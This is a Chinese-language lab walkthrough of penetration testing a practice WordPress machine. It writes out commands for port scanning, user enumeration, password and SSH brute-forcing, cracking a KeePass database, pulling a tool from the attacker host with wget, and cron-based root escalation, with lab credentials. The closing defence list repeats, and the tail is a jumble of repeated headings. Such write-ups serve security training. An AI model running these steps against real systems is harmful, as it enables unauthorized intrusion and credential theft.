WordPress靶场渗透测试实战教学文档<\/h1>

靶场环境信息<\/h2>

Kali攻击机IP: 192.168.200.14<\/li>
靶机IP: 192.168.200.60<\/li>

目标系统: WordPress<\/li> <\/ul>

一、信息收集阶段<\/h2>

1. 端口扫描<\/h3>

使用nmap进行全端口扫描：<\/p>

nmap -A -p 1-65535 192.168.200.60
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22端口：SSH服务<\/li>
80端口：HTTP服务（WordPress）<\/li>
<\/ul>
2. Web应用识别<\/h3>
访问网站并识别框架：<\/p>

手动识别为WordPress<\/li>
也可使用工具识别：
wappalyzer 或 whatweb
<\/span><\/span><\/code><\/pre><\/li>
WordPress后台登录页面：wp-login.php<\/code><\/li>
<\/ul>
二、漏洞探测阶段<\/h2>
3. WordPress用户枚举<\/h3>
使用WPScan枚举用户：<\/p>
wpscan --url "http:\/\/192.168.200.60\/"<\/span> -e u
<\/span><\/span><\/code><\/pre>发现用户：<\/p>

gadd<\/li>
gill<\/li>
collins<\/li>
satanic<\/li>
abuzerkomurcu<\/li>
<\/ul>
将用户名保存到文件：<\/p>
echo "gadd\ngill\ncollins\nsatanic\nabuzerkomurcu"<\/span> > username.txt
<\/span><\/span><\/code><\/pre>4. 目录扫描<\/h3>
使用gobuster进行目录扫描：<\/p>
gobuster dir -u http:\/\/192.168.200.60 -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt -x php,jpg,txt,html
<\/span><\/span><\/code><\/pre>5. 密码字典生成<\/h3>
使用cewl爬取网站内容生成密码字典：<\/p>
cewl -m 6<\/span> -w passwd.txt http:\/\/192.168.200.60
<\/span><\/span><\/code><\/pre>6. WordPress密码爆破<\/h3>
使用WPScan进行密码爆破：<\/p>
wpscan --url http:\/\/192.168.200.60 -U username.txt -P passwd.txt
<\/span><\/span><\/code><\/pre>成功爆破出凭证：<\/p>

用户名：gill<\/li>
密码：interchangeable<\/li>
<\/ul>
三、获取初始访问权限<\/h2>
7. 图片隐写分析<\/h3>
下载网站logo图片：<\/p>
wget 192.168.200.60\/wp-content\/uploads\/2021\/02\/dblogo.png
<\/span><\/span><\/code><\/pre>使用exiftool分析图片：<\/p>
exiftool dblogo.png
<\/span><\/span><\/code><\/pre>发现SSH密码：59583hello<\/code><\/p>
8. SSH爆破<\/h3>
使用hydra进行SSH爆破：<\/p>
hydra -L username.txt -p 59583hello ssh:\/\/192.168.200.60
<\/span><\/span><\/code><\/pre>成功登录后发现KDBX文件（KeePass密码数据库）<\/p>
四、权限提升阶段<\/h2>
9. KDBX文件处理<\/h3>
将KDBX文件下载到本地：<\/p>
scp -rp gill@192.168.200.60:\/home\/gill\/keyfile.kdbx \/tmp
<\/span><\/span><\/code><\/pre>使用keepass2john提取哈希：<\/p>
keepass2john keyfile.kdbx > keyfile.hash
<\/span><\/span><\/code><\/pre>使用john爆破哈希：<\/p>
john keyfile.hash --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>得到密码：porsiempre<\/code><\/p>
10. 解密KeePass数据库<\/h3>
方法一：使用KeePass工具导入kdbx文件并输入密码<\/p>
方法二：使用在线工具https:\/\/app.keeweb.info\/<\/p>
发现可能的root密码：<\/p>
2real4surreal
buddyretardcloset313
exaltedfracturedocean
zakkwylde
<\/code><\/pre>
11. 定时任务提权<\/h3>
发现\/keyfolder目录，上传pspy64监控进程：<\/p>
wget 192.168.200.14:8000\/pspy64
<\/span><\/span>chmod +x pspy64
<\/span><\/span>.\/pspy64
<\/span><\/span><\/code><\/pre>发现定时执行\/root\/key.sh<\/code><\/p>
12. 最终提权<\/h3>
根据KeePass数据库中的名称创建文件，等待定时任务执行：<\/p>
touch "2real4surreal"<\/span> "buddyretardcloset313"<\/span> "exaltedfracturedocean"<\/span> "zakkwylde"<\/span>
<\/span><\/span><\/code><\/pre>获得新文件，其中包含root密码：imjustdrifting31<\/code><\/p>
五、总结与工具清单<\/h2>
关键工具<\/h3>

nmap<\/strong> - 端口扫描<\/li>
wpscan<\/strong> - WordPress漏洞扫描<\/li>
cewl<\/strong> - 密码字典生成<\/li>
hydra<\/strong> - 密码爆破<\/li>
exiftool<\/strong> - 图片元数据分析<\/li>
keepass2john + john<\/strong> - KDBX文件破解<\/li>
pspy<\/strong> - 进程监控<\/li>
<\/ol>
关键技巧<\/h3>

WordPress用户枚举与密码爆破<\/li>
图片隐写分析<\/li>
KeePass数据库破解<\/li>
定时任务监控与利用<\/li>
SCP文件传输<\/li>
<\/ol>
防御建议<\/h3>

限制WordPress用户枚举<\/li>
使用强密码策略<\/li>
避免在图片中存储敏感信息<\/li>
限制定时任务权限<\/li>
定期审计系统文件权限<\/li>
<\/ol>

WordPress靶场渗透测试实战教学文档<\/h1>

一、信息收集阶段<\/h2>

二、漏洞探测阶段<\/h2>

三、获取初始访问权限<\/h2>

四、权限提升阶段<\/h2>

防御建议<\/h3> 限制WordPress用户枚举<\/li> 使用强密码策略<\/li> 避免在图片中存储敏感信息<\/li> 限制定时任务权限<\/li> 定期审计系统文件权限<\/li> <\/ol>

防御建议<\/h3>

限制WordPress用户枚举<\/li>
使用强密码策略<\/li>
避免在图片中存储敏感信息<\/li>
限制定时任务权限<\/li>
定期审计系统文件权限<\/li> <\/ol>